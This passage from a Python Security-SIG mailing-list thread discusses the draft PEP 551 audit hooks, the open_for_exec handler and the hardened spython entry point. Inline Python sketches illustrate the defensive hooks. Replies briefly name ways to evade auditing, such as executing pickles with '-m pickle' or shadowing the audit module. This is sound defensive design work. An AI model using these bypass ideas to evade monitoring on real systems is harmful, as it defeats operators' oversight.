> function before the ``os`` module has been imported, it will be available
> on the ``nt``/``posix`` modules, but the intent is that other users will
> access it through the ``os`` module.)
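
The dispatch between the default behaviour and a custom handler can be sketched in pure Python. This assumes a module-level variable in place of the handler that ``Py_SetOpenForExecuteHandler()`` would install from C; `open_for_exec` and `set_open_for_exec_handler` here are hypothetical Python stand-ins, and `os.fspath()` only approximates the "processed narrow or wide path" the real handler receives.

```python
import io
import os
import tempfile
from typing import BinaryIO, Callable, Optional, Union

PathLike = Union[str, bytes, os.PathLike]
Handler = Callable[[Union[str, bytes]], BinaryIO]

# Hypothetical stand-in for the handler installed from C.
_handler: Optional[Handler] = None


def set_open_for_exec_handler(handler: Handler) -> None:
    global _handler
    _handler = handler


def open_for_exec(path: PathLike) -> BinaryIO:
    """Drop-in replacement for open(path, 'rb')."""
    resolved = os.fspath(path)          # approximates the "processed" path
    if _handler is None:
        return io.open(resolved, "rb")  # default: raw binary access
    return _handler(resolved)           # handler's result is returned directly


# Usage: default behaviour first, then with a handler that returns BytesIO.
with tempfile.NamedTemporaryFile(suffix=".py", delete=False) as tmp:
    tmp.write(b"print('hi')\n")
with open_for_exec(tmp.name) as f:
    default_bytes = f.read()
set_open_for_exec_handler(lambda p: io.BytesIO(b"# verified copy\n"))
with open_for_exec(tmp.name) as f:
    handled_bytes = f.read()
os.remove(tmp.name)
```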
>
> A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
> from C at any time, including before ``Py_Initialize()``. When
> ``open_for_exec()`` is called with a handler set, the handler will be
> passed the processed narrow or wide path, depending on platform, and its
> return value will be returned directly. The returned object should be an
> open file-like object that supports reading raw bytes. This is explicitly
> intended to allow a ``BytesIO`` instance if the open handler has already
> had to read the file into memory in order to perform whatever
> verification is necessary to determine whether the content is permitted
> to be executed.
>
> Note that these handlers can import and call the ``_io.open()`` function on
> CPython without triggering themselves.
>
> If the handler determines that the file is not suitable for execution, it
> should raise an exception of its choice, as well as performing any other
> logging or notifications.
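
A verifying handler of the kind described above could read the file once, check it, and return the verified bytes as a ``BytesIO``. This sketch assumes a hypothetical in-memory SHA-256 allowlist (`APPROVED_SHA256`) and a hypothetical exception type; a real deployment would load approvals from a protected location or defer to a platform mechanism. `io.open` is used because on CPython it is the same object as ``_io.open``.

```python
import hashlib
import io
import os
import tempfile
from typing import Set, Union

# Hypothetical allowlist of SHA-256 digests approved for execution.
APPROVED_SHA256: Set[str] = set()


class UnapprovedCodeError(PermissionError):
    """Raised when a file's contents are not on the allowlist."""


def verifying_handler(path: Union[str, bytes]) -> io.BytesIO:
    # Read once, so the bytes that are hashed are exactly the bytes that
    # will be executed; the file is not re-read after the check.
    with io.open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest not in APPROVED_SHA256:
        # Any other logging or notification would also happen here.
        raise UnapprovedCodeError(f"{os.fsdecode(path)}: {digest} not approved")
    return io.BytesIO(data)


# Usage: approve one file's content, then revoke the approval.
with tempfile.NamedTemporaryFile(suffix=".py", delete=False) as tmp:
    tmp.write(b"x = 1\n")
APPROVED_SHA256.add(hashlib.sha256(b"x = 1\n").hexdigest())
approved = verifying_handler(tmp.name).read()
APPROVED_SHA256.clear()
try:
    verifying_handler(tmp.name)
    rejected = False
except UnapprovedCodeError:
    rejected = True
os.remove(tmp.name)
```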
>
> All import and execution functionality involving code from a file will be
> changed to use ``open_for_exec()`` unconditionally. It is important to
> note that calls to ``compile()``, ``exec()`` and ``eval()`` do not go
> through this function - a log hook that includes the code from these
> calls will be added and is the best opportunity to validate code that is
> read from the file. Given the current decoupling between import and
> execution in Python, most imported code will go through both
> ``open_for_exec()`` and the log hook for ``compile``, and so care should
> be taken to avoid repeating verification steps.
>
> API Availability
> ----------------
>
> While all the functions added here are considered public and stable API,
> the behavior of the functions is implementation specific. The
> descriptions here refer to the CPython implementation, and while other
> implementations should provide the functions, there is no requirement
> that they behave the same.
>
> For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but
> may do nothing. This allows code to make calls to ``sys.loghook()``
> without having to test for existence, but it should not assume that its
> call will have any effect. (Including existence tests in
> security-critical code allows another vector to bypass logging, so it is
> preferable that the function always exist.)
>
> ``os.open_for_exec()`` should at a minimum always return
> ``_io.open(pathlike, 'rb')``. Code using the function should make no
> further assumptions about what may occur, and implementations other than
> CPython are not required to let developers override the behavior of this
> function with a hook.
>
>
> Log Hook Locations
> ==================
>
> Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
> following operations with the schema in Table 1. Unless otherwise
> specified, the ability for log hooks to abort any listed operation should
> be considered part of the rationale for including the hook.
>
> .. csv-table:: Table 1: Log Hooks
>     :header: "API Function", "Event Name", "Arguments", "Rationale"
>     :widths: 2, 2, 3, 6
>
>     ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
>     hooks are being added."
>     ``_Py_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks
>     they are being cleaned up, mainly in case the event is triggered
>     unexpectedly. This event cannot be aborted."
>     ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
>     any attempt to set the ``open_for_exec`` handler."
>     "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
>     ``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
>     this will also be called for regular imports of source code, including
>     those that used ``open_for_exec``."
>     ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
>     sys.path_hooks)``", "Detect when modules are imported. This is raised
>     before the module name is resolved to a file. All arguments other than
>     the module name may be ``None`` if they are not used or available."
>     "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
>     ``(module_or_path,)``", "Detect when native modules are used."
>     ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
>     information about specific symbols retrieved from native modules."
>     ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when
>     code is accessing arbitrary memory using ``ctypes``."
>     ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id
>     of objects, which in CPython reveals information about memory layout."
>     ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
>     code is accessing frames directly."
>     ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code
>     is accessing frames directly."
>     ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
>     injecting profile functions. Because of the implementation, exceptions
>     raised from the hook will abort the operation, but will not be raised in
>     Python code. Note that ``threading.setprofile`` eventually calls this
>     function, so the event will be logged for each thread."
>     ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
>     injecting trace functions. Because of the implementation, exceptions
>     raised from the hook will abort the operation, but will not be raised in
>     Python code. Note that ``threading.settrace`` eventually calls this
>     function, so the event will be logged for each thread."
>     ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
>     Detect changes to async generator hooks."
>     ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect
>     changes to the coroutine wrapper."
>     ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "
>     Detect changes to the recursion limit."
>     ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "
>     ``(interval_us,)``", "Detect changes to the switching interval."
>     "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
>     ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "
>     ``(address,)``", "Detect access to network resources. The address is
>     unmodified from the original call."
>     ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
>     creation of sockets. The arguments will be int values."
>     ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
>     retrieve the current host name."
>     ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
>     attempts to change the current host name. The name argument is passed
>     as a bytes object."
>     "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
>     ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution.
>     The name argument is a str or bytes object."
>     ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "
>     Detect host resolution. The address argument is a str or bytes object."
>     ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
>     protocol)``", "Detect service resolution. The arguments are str objects."
>     ``socket.getservbyport``, ``socket.getservbyport``, "``(port,
>     protocol)``", "Detect service resolution. The port argument is an int and
>     protocol is a str."
>
> TODO - more hooks in ``_socket``, ``_ssl``, others?
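
Because each event name has a fixed argument schema, a hook can label arguments by name when writing them out. The sketch below copies field names for a few rows of Table 1 into a hypothetical `SCHEMAS` dictionary and renders each event as one JSON line; unknown events are still recorded with positional arguments rather than dropped. Values are stored with `repr()` because objects such as code objects or ``sys.path`` are not JSON-serializable; that choice is an assumption of this sketch.

```python
import json
from typing import Dict, List

# Field names for a few events, taken from the schemas in Table 1.
SCHEMAS: Dict[str, List[str]] = {
    "compile": ["code", "filename_or_none"],
    "import": ["module", "filename", "sys_path", "sys_meta_path", "sys_path_hooks"],
    "ctypes.dlopen": ["module_or_path"],
    "socket.address": ["address"],
    "sys.setrecursionlimit": ["new_limit"],
}


def format_event(event: str, args: tuple) -> str:
    """Render one event as a JSON line without filtering anything out."""
    names = SCHEMAS.get(event)
    if names is not None and len(names) == len(args):
        fields = {name: repr(value) for name, value in zip(names, args)}
    else:
        fields = {"args": [repr(value) for value in args]}
    return json.dumps({"event": event, **fields}, sort_keys=True)


log_lines: List[str] = []


def json_log_hook(event: str, args: tuple) -> None:
    log_lines.append(format_event(event, args))


json_log_hook("socket.address", (("example.com", 443),))
json_log_hook("id", (140234,))  # not in SCHEMAS, logged positionally
```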
>
>
> SPython Entry Point
> ===================
>
> A new entry point binary will be added, called ``spython.exe`` on Windows
> and ``spythonX.Y`` on other platforms. This entry point is intended
> primarily as an example, as we expect most users of this functionality to
> implement their own entry point and hooks (see `Recommendations`_). It
> will also be used for tests.
>
> Source builds will create ``spython`` by default, but distributors may
> choose whether to include ``spython`` in their pre-built packages. The
> python.org managed binary distributions will not include ``spython``.
>
> **Do not accept most command-line arguments**
>
> The ``spython`` entry point requires a script file be passed as the first
> argument, and does not allow any options. This prevents arbitrary code
> execution from in-memory data or non-script files (such as pickles, which
> can be executed using ``-m pickle <path>``).
>
> Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
> variables) and ``-s`` (no user site) are assumed.
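
The "script file first, no options" rule could be checked by an entry point before doing anything else. This is a minimal sketch with a hypothetical `validate_argv` helper; it assumes that anything after the script path belongs to the script, as with the regular ``python`` launcher.

```python
from typing import List, Sequence


class UsageError(Exception):
    """Raised when the command line does not start with a script path."""


def validate_argv(argv: Sequence[str]) -> List[str]:
    """Return the script path plus its arguments, or raise UsageError.

    argv[0] is the executable; argv[1] must be a script file, not an option.
    """
    if len(argv) < 2:
        raise UsageError("a script file must be passed as the first argument")
    script = argv[1]
    if script.startswith("-"):
        # Rejects -c, -m (e.g. "-m pickle <path>"), and "-" for stdin.
        raise UsageError(f"options are not accepted: {script!r}")
    return list(argv[1:])
```

For example, ``validate_argv(["spython", "app.py", "--verbose"])`` returns ``["app.py", "--verbose"]``, while ``["spython", "-m", "pickle", "data.pkl"]`` is rejected.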
>
> If a file with the same full path as the process with a ``._pth`` suffix
> (``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
> will be used to initialize ``sys.path`` following the rules currently
> described `for Windows
> <https://docs.python.org/3/using/windows.html#finding-modules>`_.
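
Deriving the ``._pth`` location from the process path has one subtlety worth showing: on non-Windows platforms the version in ``spythonX.Y`` looks like an extension to `os.path.splitext()`. The helper below, `pth_path_for`, is hypothetical; a caller would typically pass ``sys.executable``.

```python
import os


def pth_path_for(executable: str, windows: bool) -> str:
    """Return the ._pth path that sits next to, and is named after, the process.

    spython.exe -> spython._pth on Windows; spython3.7 -> spython3.7._pth
    elsewhere. splitext() is not used outside Windows because it would treat
    the ".7" in "spython3.7" as an extension.
    """
    if windows:
        base, ext = os.path.splitext(executable)
        if ext.lower() == ".exe":
            executable = base
    return executable + "._pth"
```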
>
> **Log security events to a file**
>
> Before initialization, ``spython`` will set a log hook that writes events
> to a local file. By default, this file is the full path of the process
> with a ``.log`` suffix, but may be overridden with the ``SPYTHONLOG``
> environment variable (despite such overrides being explicitly discouraged
> in `Recommendations`_).
>
> The log hook will also abort all ``addloghook`` events, preventing any
> other hooks from being added.
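
The ``spython`` log hook's two duties (write every event, refuse new hooks) might look like this in Python. The class `FileLogHook` and the function `resolve_log_path` are hypothetical; the default log path is passed in rather than computed, and a `StringIO` stands in for the file so the sketch has no side effects. In practice the stream would be a file opened for appending.

```python
import io
from typing import Mapping, TextIO


def resolve_log_path(default_path: str, environ: Mapping[str, str]) -> str:
    # SPYTHONLOG overrides the default, although Recommendations discourages
    # honouring such overrides in production entry points.
    return environ.get("SPYTHONLOG", default_path)


class FileLogHook:
    """Append every event to a text stream and refuse any further hooks."""

    def __init__(self, stream: TextIO) -> None:
        self.stream = stream

    def __call__(self, event: str, args: tuple) -> None:
        # Write first, so even an aborted addition leaves a record.
        self.stream.write(f"{event}\t{args!r}\n")
        self.stream.flush()
        if event == "sys.addloghook":
            raise RuntimeError("spython does not allow additional log hooks")


buffer = io.StringIO()
hook = FileLogHook(buffer)
hook("import", ("json", None, None, None, None))
try:
    hook("sys.addloghook", (print,))
    added = True
except RuntimeError:
    added = False
```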
>
> On Windows, code from ``compile`` events will be submitted to AMSI [5]_
> and if it fails to validate, the compile event will be aborted. This can
> be tested by calling ``compile()`` or ``eval()`` on the contents of the
> `EICAR test file <http://www.eicar.org/86-0-Intended-use.html>`_.
>
> **Restrict importable modules**
>
> Also before initialization, ``spython`` will set an open-for-execute hook
> that validates all files opened with ``os.open_for_exec``. This
> implementation will require all files to have a ``.py`` suffix (thereby
> blocking the use of cached bytecode), and will raise a custom log message
> ``spython.open_for_exec`` containing ``(filename, True_if_allowed)``.
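
The suffix rule and its custom event can be sketched in Python. Here `events` and `log_event` are hypothetical stand-ins for ``sys.loghook()``, and `spython_style_open_for_exec` is an illustrative handler, not the one ``spython`` will ship. The suffix comparison is case-sensitive in this sketch.

```python
import io
import os
import tempfile
from typing import BinaryIO, List, Tuple, Union

# Hypothetical event sink standing in for sys.loghook().
events: List[Tuple[str, tuple]] = []


def log_event(event: str, *args) -> None:
    events.append((event, args))


def spython_style_open_for_exec(path: Union[str, bytes]) -> BinaryIO:
    filename = os.fsdecode(path)
    # Only source files are allowed, which also rules out cached .pyc files.
    allowed = filename.endswith(".py")
    log_event("spython.open_for_exec", filename, allowed)
    if not allowed:
        raise PermissionError(f"refusing to execute {filename!r}")
    return io.open(path, "rb")


# Usage: one source file is accepted, one bytecode file is refused.
paths = []
for suffix in (".py", ".pyc"):
    with tempfile.NamedTemporaryFile(suffix=suffix, delete=False) as tmp:
        tmp.write(b"pass\n")
    paths.append(tmp.name)

with spython_style_open_for_exec(paths[0]) as f:
    source = f.read()
try:
    spython_style_open_for_exec(paths[1])
    pyc_opened = True
except PermissionError:
    pyc_opened = False
for p in paths:
    os.remove(p)
```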
>
> On Windows, the hook will also open the file with flags that prevent any
> other process from opening it with write access, which allows the hook to
> perform additional validation on the contents with confidence that it
> will not be modified between the check and use. Compilation will later
> trigger a ``compile`` event, so there is no need to read the contents now
> for AMSI, but other validation mechanisms such as DeviceGuard [4]_ should
> be performed here.
>
>
> Performance Impact
> ==================
>
> **TODO**
>
> Full impact analysis still requires investigation. Preliminary testing
> shows that calling ``sys.loghook`` with no hooks added does not
> significantly affect any existing benchmarks, though targeted
> microbenchmarks can observe an impact.
>
> The performance impact of using ``spython`` or of adding hooks is not of
> interest here, since this is considered opt-in functionality.
>
>
> Recommendations
> ===============
>
> Specific recommendations are difficult to make, as the ideal
> configuration for any environment will depend on the user's ability to
> manage, monitor, and respond to activity on their own network. However,
> many of the proposals here do not appear to be of value without deeper
> illustration. This section provides recommendations using the terms
> **should** (or **should not**), indicating that we consider it dangerous
> to ignore the advice, and **may**, indicating that the advice ought to be
> considered for high-value systems. The term **sysadmins** refers
> to whoever is responsible for deploying Python throughout your network,
> though different organizations may have different titles for the
> relevant person.
>
> Sysadmins **should** build their own entry point, likely starting from
> ``spython``, and directly interface with the security systems available
> in their environment. The more tightly integrated, the less likely a
> vulnerability will be found allowing an attacker to bypass those
> systems. In particular, the entry point **should not** obtain any
> settings from the current environment, such as environment variables,
> unless those settings are otherwise protected from modification.
>
> The default ``python`` entry point **should not** be deployed to
> production machines, but could be given to developers to use and test
> Python on non-production machines. Sysadmins **may** consider deploying
> a less restrictive version of their entry point to developer machines,
> since any system connected to your network is a potential target.
>
> Python deployments **should** be made read-only using any available
> platform functionality after deployment and during use.
>
> On platforms that support it, sysadmins **should** include signatures
> for every file in a Python deployment, ideally verified using a private
> certificate. For example, Windows supports embedding signatures in
> executable files and using catalogs for others, and can use DeviceGuard
> [4]_ to validate signatures either automatically or using an
> ``open_for_exec`` hook.
>
> Sysadmins **should** collect as many logged events as possible, and
> **should** copy them off of local machines frequently. Even if logs are
> not being constantly monitored for suspicious activity, once an attack
> is detected it is too late to enable logging. Log hooks **should not**
> attempt to preemptively filter events, as even benign events are useful
> when analyzing the progress of an attack. (Watch the "No Easy Breach"
> video under `Further Reading`_ for a deeper look at this side of things.)
>
> Log hooks **should** write events to logs before attempting to abort. As
> discussed earlier, it is more important to record malicious actions than
> to prevent them. Very few actions should be aborted, as most will occur
> during normal use. Sysadmins **may** audit their Python code and abort
> operations that are known to never be used deliberately.
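
A hook following these two recommendations writes the record before deciding whether to abort, and aborts only a short, audited list of events. The class `AuditThenAbortHook` is hypothetical, and the denylist contents are assumed to come from the sysadmin's own audit of which operations their code never uses.

```python
import io
from typing import FrozenSet, TextIO


class AuditThenAbortHook:
    """Record every event, then abort only events on an explicit denylist."""

    def __init__(self, stream: TextIO, denied: FrozenSet[str]) -> None:
        self.stream = stream
        self.denied = denied

    def __call__(self, event: str, args: tuple) -> None:
        # Always write first: the record matters more than the block.
        self.stream.write(f"{event}\t{args!r}\n")
        self.stream.flush()
        if event in self.denied:
            raise PermissionError(f"{event} is not permitted on this system")


log = io.StringIO()
# Hypothetical denylist, e.g. after confirming no deployed code uses ctypes.
hook = AuditThenAbortHook(log, frozenset({"ctypes.dlopen"}))
hook("import", ("json", None, None, None, None))
try:
    hook("ctypes.dlopen", ("libc.so.6",))
except PermissionError:
    pass
```

Both events end up in the log, including the one that was aborted.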
>
> On production machines, the first log hook **should** be set in C code
> before ``Py_Initialize`` is called, and that hook **should**
> unconditionally abort the ``sys.addloghook`` event. The Python interface
> is mainly useful for testing.
>
> On production machines, a non-validating ``open_for_exec`` hook **may**
> be set in C code before ``Py_Initialize`` is called. This prevents later
> code from overriding the hook; however, logging the
> ``setopenforexecutehandler`` event is still useful, since no code should
> ever need to call it. Using at least the sample ``open_for_exec`` hook
> implementation from ``spython`` is recommended.
>
> [TODO: more good advice; less bad advice]
>
> Further Reading
> ===============
>
>
> **Redefining Malware: When Old Terms Pose New Threats**
>      By Aviv Raff for SecurityWeek, 29th January 2014
>
>      This article, and those linked by it, are high-level summaries of the
>      rise of APTs and the differences from "traditional" malware.
>
>      `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_
>
> **Anatomy of a Cyber Attack**
>      By FireEye, accessed 23rd August 2017
>
>      A summary of the techniques used by APTs, and links to a number of
>      relevant whitepapers.
>
>      `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_
>
> **Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
>      By Aviv Raff for SecurityWeek, 8th May 2014
>
>      High-level summary of the value of detailed logging and automatic
>      analysis.
>
>      `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_
>
> **No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
>      Video presented by Matt Dunwoody and Nick Carr for Mandiant at
>      ShmooCon 2016
>
>      Detailed walkthrough of the processes and tools used in detecting and
>      removing an APT.
>
>      `<https://archive.org/details/No_Easy_Breach>`_
>
> **Disrupting Nation State Hackers**
>      Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
>
>      Good security practices, capabilities and recommendations from the
>      chief of NSA's Tailored Access Operations.
>
>      `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_
>
> References
> ==========
>
> .. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
>
> .. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
>     Protection Advances in Windows 10,
>     `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_
>
> .. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_
>
> .. [4] `<https://aka.ms/deviceguard>`_
>
> .. [5] AMSI,
>     `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_
>
> .. [6] Persistent Zone Identifiers,
>     `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_
>
> .. [7] Event tracing,
>     `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_
>
> .. [8] `<https://www.gnupg.org/>`_
>
> .. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
>
> .. [10] `<http://www.trustedbsd.org/openbsm.html>`_
>
> .. [11] `<https://linux.die.net/man/3/syslog>`_
>
> Acknowledgments
> ===============
>
> Thanks to all the people from Microsoft involved in helping make the
> Python runtime safer for production use, and especially to James Powell
> for doing much of the initial research, analysis and implementation, Lee
> Holmes for invaluable insights into the info-sec field and PowerShell's
> responses, and Brett Cannon for the grounding discussions.
>
> Copyright
> =========
>
> Copyright (c) 2017 by Microsoft Corporation. This material may be
> distributed only subject to the terms and conditions set forth in the
> Open Publication License, v1.0 or later (the latest version is presently
> available at http://www.opencontent.org/openpub/).
>

From ncoghlan at gmail.com  Fri Aug 25 02:17:34 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Fri, 25 Aug 2017 16:17:34 +1000
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>

Migrating my comments from Twitter :)

I really like this PEP as a way of enabling runtime hardening of
platform-integrated Python builds, without tightly coupling upstream
development to the evolution of the related platform security APIs, so
a big +1 from me for the general idea.

On 25 August 2017 at 03:13, Steve Dower <steve.dower at python.org> wrote:
> On Linux, some specific features that may be integrated are:
>
> * gnupg [8]_
> * sd_journal [9]_
> * OpenBSM [10]_
> * syslog [11]_
> * check execute bit on imported modules

A couple more references/integration ideas:

* emitting Linux audit log events
(https://github.com/linux-audit/audit-documentation/wiki/SPEC-Writing-Good-Events)
* restricting imports and code execution to files with appropriate
SELinux labels (e.g. defining a "py_exec_t" type and checking that in
open_for_exec)

We wouldn't be able to do this kind of thing to /usr/bin/python3
without breaking the world, but there's more scope for making changes
to private installations like Fedora's /usr/libexec/platform-python
(see https://fedoraproject.org/wiki/Changes/Platform_Python_Stack -
we're not going to migrate everything to use that, but we *do* want to
get to the point where that's the only Python available in a minimal
Fedora install, which means migrating at least dnf/yum and the
associated plugins).

> Event Log Hook
> --------------
>
> In order to achieve security transparency, an API is required to raise
> messages from within certain operations. These operations are typically
> deep within the Python runtime or standard library, such as dynamic code
> compilation, module imports, DNS resolution, or use of certain modules
> such as ``ctypes``.
>
> The new APIs required for log hooks are::
>
>    # Add a logging hook
>    sys.addloghook(hook: Callable[str, tuple]) -> None
>    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
>
>    # Raise an event with all logging hooks
>    sys.loghook(str, *args) -> None
>    int PySys_LogHook(const char *event, PyObject *args);
>
>    # Internal API used during Py_Finalize() - not publicly accessible
>    void _Py_ClearLogHooks(void);

Bikeshed: to more clearly distinguish this proposal from regular
logging module events, I'd suggest calling these audit hooks rather
than log hooks. I also think this could be a separate module at the
Python level (e.g. "runtimeaudit"), and a separate prefix at the C API
level (e.g. "PyAudit_*") rather than needing to be directly in the sys
namespace.

Cheers,
Nick.

-- 
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From steve.dower at python.org  Fri Aug 25 13:22:41 2017
From: steve.dower at python.org (Steve Dower)
Date: Fri, 25 Aug 2017 10:22:41 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
Message-ID: <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>

On 24Aug2017 2317, Nick Coghlan wrote:
> Migrating my comments from Twitter :)
> 
> I really like this PEP as a way of enabling runtime hardening of
> platform-integrated Python builds, without tightly coupling upstream
> development to the evolution of the related platform security APIs, so
> a big +1 from me for the general idea.

Thanks!

> On 25 August 2017 at 03:13, Steve Dower <steve.dower at python.org> wrote:
>> On Linux, some specific features that may be integrated are:
>>
>> * gnupg [8]_
>> * sd_journal [9]_
>> * OpenBSM [10]_
>> * syslog [11]_
>> * check execute bit on imported modules
> 
> A couple more references/integration ideas:
> 
> * emitting Linux audit log events
> (https://github.com/linux-audit/audit-documentation/wiki/SPEC-Writing-Good-Events)
> * restricting imports and code execution to files with appropriate
> SELinux labels (e.g. defining a "py_exec_t" type and checking that in
> open_for_exec)

Nice. I looked into SELinux and didn't find any docs about how to add 
labels. I'd really like to include links that help people actually 
implement this stuff - any tips?

> We wouldn't be able to do this kind of thing to /usr/bin/python3
> without breaking the world, but there's more scope for making changes
> to private installations like Fedora's /usr/libexec/platform-python
> (see https://fedoraproject.org/wiki/Changes/Platform_Python_Stack -
> we're not going to migrate everything to use that, but we *do* want to
> get to the point where that's the only Python available in a minimal
> Fedora install, which means migrating at least dnf/yum and the
> associated plugins).

Yep, that's the use case, though auditing /usr/bin/python3 shouldn't 
inherently break anything. Actually aborting operations or restricting 
imports in any way only makes sense in a fully (or mostly) controlled 
environment.

> Bikeshed: to more clearly distinguish this proposal from regular
> logging module events, I'd suggest calling these audit hooks rather
> than log hooks. I also think this could be a separate module at the
> Python level (e.g. "runtimeaudit"), and a separate prefix at the C API
> level (e.g. "PyAudit_*") rather than needing to be directly in the sys
> namespace.

+1 on "audit hooks" - I'll change to that when I do my next pass. But -1 
on having the separate module and -0 on "PyAudit_*" (as a result of it 
not being in its own module).

It's important to minimise the surface area of these features, and 
having the ability to disable auditing by shadowing/replacing a module 
is a little scary. At least when you replace sys you've got to do a bit 
of work to keep it a secret. (This is also the reasoning for using 
static variables internally rather than interpreter state - it's much 
harder to infer the address of a static C variable with pure Python code 
than a field in a struct.)

Though as long as the replacement itself triggers an auditable event, 
regardless of subsequent events, we have been successful. Currently 
though, `sys.modules['audit'] = SomethingElse` is not audited (and 
likely not trivial - of course, that doesn't block this PEP, but it 
remains as a future possibility for someone who wants to make it happen).

Cheers,
Steve

From james at dontusethiscode.com  Fri Aug 25 13:53:38 2017
From: james at dontusethiscode.com (James Powell)
Date: Fri, 25 Aug 2017 13:53:38 -0400
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
Message-ID: <DBE55D32-4DA0-4BF8-97E1-32DD3169D87D@dontusethiscode.com>


> On Aug 25, 2017, at 13:22, Steve Dower <steve.dower at python.org> wrote:
> (This is also the reasoning for using static variables internally rather than interpreter state - it's much harder to infer the address of a static C variable with pure Python code than a field in a struct.)

I'll add a little bit of detail. These aren't "security features"; they're "security transparency features." We acknowledge that we cannot block every malicious payload, but we should at least make it possible to audit interpreter state for post-mortem forensic purposes. 

We wouldn't want it to be too easy to turn off these auditing features, and I've done a good amount of research into corrupting the running state of a CPython interpreter. Keeping things in builtin modules and in memory not directly exposed to the interpreter creates a real barrier to these techniques, and makes it meaningfully harder for an attacker to just disable the features at the start of their payload.

:h


From christian at python.org  Fri Aug 25 13:58:20 2017
From: christian at python.org (Christian Heimes)
Date: Fri, 25 Aug 2017 19:58:20 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CADiSq7d83-o9e8WgUUuhhb+M=P+PdEb+HMHR0vzPPxAcYv+Wsg@mail.gmail.com>
 <df3f3111-a541-dcad-7b33-0fdd31615706@python.org>
Message-ID: <e58db67e-30b0-f9e2-6b4c-cd9fe651f0fe@python.org>

On 2017-08-25 19:22, Steve Dower wrote:
> Nice. I looked into SELinux and didn't find any docs about how to add
> labels. I'd really like to include links that help people actually
> implement this stuff - any tips?

You can use chcon (change context) to temporarily change the labels of a
file or directory structure. However, that is not the recommended way to
deal with SELinux labels. Typically SELinux types and labels are either
defined in the system global policy or by additional package policies.
File labels are usually set by rules. This has the advantage that new
files automatically get the right context.

Here is a simplified and partial example for a simple Python
'myservice'. When the service is started by the init system, the process
automatically transitions into the myservice_t domain.

# file context
